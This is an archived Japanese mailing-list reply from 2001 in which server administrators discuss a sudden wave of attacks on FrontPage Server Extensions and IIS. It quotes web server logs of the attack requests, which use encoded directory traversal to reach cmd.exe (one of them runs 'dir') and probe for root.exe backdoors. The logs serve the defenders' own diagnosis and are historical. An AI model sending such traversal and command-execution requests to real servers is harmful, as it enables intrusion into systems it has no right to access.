[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[connect24h:04645] Re: FrontPage Server Extensions への攻撃 ?
- To: connect24h@xxxxxxxxxxxxxxxxxxxx
- Subject: [connect24h:04645] Re: FrontPage Server Extensions への攻撃 ?
- From: Takahiro Kaneko <kaneko@xxxxxxxxxxxxxxx>
- Date: Tue, 18 Sep 2001 23:40:37 +0900
金子です。
HIRAMOTO Koujiさんは<20010918.225636.89465175.hiramoto@xxxxxxxxxxx>で書きました。
> 今日になって急に
>
>XXX.XX.XXX.XX - - [18/Sep/2001:22:49:46 +0900] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321
>
>に代表されるような FrontPage Server Extensions (って Windows系?)狙
>いのクラックが大量にくるようになったのですが、これって何か周期とか、
>攻撃先決定ルールとか、あるんでしょうか?
うちにも来てます。
この1時間くらいで300以上この手のアクセスがあります。
IIS のログにはこんなのが並んでいます。
攻撃パターンとしてはおなじみの物ですが、新種なんでしょうか。
--
2001-09-18 14:14:27 XXX.XXX.XXX.XXX GET /scripts/root.exe 404 - -
2001-09-18 14:14:27 XXX.XXX.XXX.XXX GET /MSADC/root.exe 404 - -
2001-09-18 14:14:28 XXX.XXX.XXX.XXX GET /c/winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:28 XXX.XXX.XXX.XXX GET /d/winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:29 XXX.XXX.XXX.XXX GET /scripts/..%5c../winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:29 XXX.XXX.XXX.XXX GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:30 XXX.XXX.XXX.XXX GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:32 XXX.XXX.XXX.XXX GET /scripts/winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:33 XXX.XXX.XXX.XXX GET /winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:33 XXX.XXX.XXX.XXX GET /scripts/..%5c../winnt/system32/cmd.exe 404 - -
2001-09-18 14:14:34 XXX.XXX.XXX.XXX GET /scripts/..%2f../winnt/system32/cmd.exe 404 - -
--
以上
------------------------------------------------------------------------
ニュース速報! はインフォシークで!!
http://www.infoseek.co.jp/Home?pg=Home.html&svx=971122